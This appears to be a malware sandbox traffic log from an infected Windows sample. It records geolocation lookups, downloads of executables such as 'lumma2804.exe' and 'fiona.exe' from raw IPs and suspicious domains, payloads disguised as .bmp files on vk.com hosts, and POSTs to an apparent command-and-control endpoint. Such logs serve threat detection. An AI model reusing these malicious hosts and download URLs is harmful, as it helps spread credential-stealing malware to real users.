Source: global traffic	HTTP traffic detected: GET /c237231/u5294803/docs/d14/fab319a9eaa9/file.bmp?extra=XekPvLwajf3zjaY5buJAe3HnfkyeicpSttiDxaJzdLoB5YHmFFoUME6QuSgS26MeSPNwYYaTqVwUYy3Yw-9Wvle-70JE1-Pdb5-fcQuxBseFU0qmjloWPkyYmuqT-KQGgal4YgoTpuk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-21.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1aFYp7.mp3 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic	HTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplogger.org
Source: global traffic	HTTP traffic detected: GET /1pRXr7.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic	HTTP traffic detected: GET /1BV4j7.mp4 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /api/bing_release.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10
Source: global traffic	HTTP traffic detected: POST /api/flash.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 113Host: 5.42.66.10
Source: global traffic	HTTP traffic detected: POST /api/flash.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 133Host: 5.42.66.10
Source: global traffic	HTTP traffic detected: HEAD /download/th/retail.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /padla/fiona.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 193.233.132.139Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /dl.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 185.172.128.203Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /download/123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /qwqw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: sextipolar.sbsCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dl.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 185.172.128.203Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /download/th/getimage12.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /padla/fiona.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 193.233.132.139Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /download/th/space.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download/th/retail.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download/123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /qwqw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: sextipolar.sbsCache-Control: no-cacheCookie: _subid=2aviuam2b4oin; 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTQ1NDU2MjF9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzE0NTQ1NjIxfSxcInRpbWVcIjoxNzE0NTQ1NjIxfSJ9.CqbM3pEsvxuFlcasa8wVpwytEIdy4QAkgAWzI6-JAZE
Source: global traffic	HTTP traffic detected: HEAD /upd/index.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: pofix.redCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download/th/getimage12.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /upd/index.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: pofix.redCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download/th/space.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/flash.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 261Host: 5.42.66.10
Source: global traffic	HTTP traffic detected: POST /api/flash.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 645Host: 5.42.66.10
Source: global traffic	HTTP traffic detected: HEAD /lumma2804.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /lumma2804.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /lumma2804.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /lumma2804.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.139
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.139
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.139
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.139
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.203

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Code function: 7_2_0041E220 recv,setsockopt,recv,WSAGetLastError,recv,recv,setsockopt,recv,recv,recv,__Xtime_get_ticks,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,Sleep,Sleep,

7_2_0041E220

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: api.myip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /7725eaa6592c80f8124e769b4e8a07f7.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: zanzibarpivo.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cad54ba5b01423b1af8ec10ab5719d97.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: triedchicken.netCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /style/060.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: dod.fastbutters.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /038bcf3a84a6c65c7cd47ac3b64b7f9b/7725eaa6592c80f8124e769b4e8a07f7.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: cheremushki.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /038bcf3a84a6c65c7cd47ac3b64b7f9b/cad54ba5b01423b1af8ec10ab5719d97.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: carthewasher.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qwqw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sextipolar.sbsConnection: Keep-AliveCookie: _subid=2aviuam2b4oin; 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTQ1NDU2MjF9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzE0NTQ1NjIxfSxcInRpbWVcIjoxNzE0NTQ1NjIxfSJ9.CqbM3pEsvxuFlcasa8wVpwytEIdy4QAkgAWzI6-JAZE
Source: global traffic	HTTP traffic detected: GET /525403/setup.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: monoblocked.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /525403/setup.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: f.123654987.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc5294803_668776833?hash=0O6PF91bZH66jRdVdr0Yhs0vV73FDPMFrSckqwaaZuH&dl=PH90vp0b08GcZph4ge7Tw9b9Uj3c1wFnC01nFynmnNL&api=1&no_preview=1#ww11 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doc5294803_669146636?hash=oOxNOsTOdJPrmnDMbC1WPJr0rvKjkZ1hobtPAeSmhS0&dl=r9dUuCDHeIUqlREMZideAXmDqLSX2CxI5qdKmkcx3po&api=1&no_preview=1#cap HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doc5294803_668917518?hash=HcqSqB4BEz69zZduDzHpG5p3oDuUGmC4h5HdrueZTFD&dl=73Wmq1mPcIfGe320FelzdYt7foFKatzHUAXVPKOvEz0&api=1&no_preview=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c909328/u5294803/docs/d50/141d7a9868fe/grwg_20240501083043.bmp?extra=LlcaPpnlc3Nm2YJa_HIxTuy8pxFR3cOfTp20BZVPqWbia3-pjLZINmv48VErXBJArrURXJc9wcRab86W2hl73jhKe_zRspSlR2tyoxWE2filhre49hjiCvIckuUXGOOQUBkTv6pEvBQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-20.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc5294803_669132669?hash=ZKjz6ih7UQ9lzkD21VhcvrQwcwdE4E0ZYGiugVcv47k&dl=WempMPmw6ufkYnUzfTIoLDfW8XiZgAu8J2F0VsJ9NwT&api=1&no_preview=1#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doc5294803_669123201?hash=XDCpjElzxewo4KzTOHuQEMVCKwzlHqQzBJyb5YKd2Jc&dl=cOyLY32AZWRaWIUaV6LVF1KVnbsjSHxC1w6esY9lvXc&api=1&no_preview=1#mene HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c237031/u5294803/docs/d48/faa96ddc856f/BotClient_make.bmp?extra=-QkfenqPxrvYtmrTIqBQ0mVeqEu8ubnNU1NG8tGGtw3-QFsDYjvYp64yJnpB_OcMg0uhKlG1RASme310Qax8_egiLSt12hVPF9Wl3DN6qYLOxmECHbAL6mz2NgJ9qEZNdnWZ6unUcjI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-20.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc5294803_669074803?hash=gtxjyDdukAIKxlWY09AIJPG5gj5TRTjhoVyhzgbP72o&dl=A9s6LaMpuQCyacGXT0hxzf0MvaBJbV8eIlyefAe3TSw&api=1&no_preview=1#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c909218/u5294803/docs/d8/57e1b3af3092/crypted.bmp?extra=Gxkm1-qUj4gTylzhygF0ymDxXHL811_5cKi0pGRSmNbB8xbMKVlvz1Dj_tciMVuEusahBVGi1kGq7gOCAviXVpJzhtwg5lCSO-f5sXIwePQ4Q0UjpInqDSzvgoI_tCv82d6g6aUD97c HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-22.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /c236331/u5294803/docs/d47/5d64691d2964/crypted.bmp?extra=kGc4Kw6r3KNmnJcNsZNoeqzxsyU48VGtKMsa8v9e4LEHURc7u4wFMmsoHQSLycKdnKbLmB8U76u1qw4WomWhiyKAlTZiZ2p3djsH9911hBclkSW3TQfktfGI1iuTmpkRbaERsG2JfXY HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-20.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc329118071_676158749?hash=wJqTXfnxe0acmwC4vumRgawHgxCuE6EviXjICmkirIT&dl=YVEMDGiurKsySjR8YhvL7Ks3RZIJ4qJjfFMeqQgdrQ8&api=1&no_preview=1#ww12 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c237231/u5294803/docs/d14/fab319a9eaa9/file.bmp?extra=XekPvLwajf3zjaY5buJAe3HnfkyeicpSttiDxaJzdLoB5YHmFFoUME6QuSgS26MeSPNwYYaTqVwUYy3Yw-9Wvle-70JE1-Pdb5-fcQuxBseFU0qmjloWPkyYmuqT-KQGgal4YgoTpuk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-21.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1aFYp7.mp3 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic	HTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplogger.org
Source: global traffic	HTTP traffic detected: GET /1pRXr7.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic	HTTP traffic detected: GET /1BV4j7.mp4 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic	HTTP traffic detected: GET /profiles/76561199680449169 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
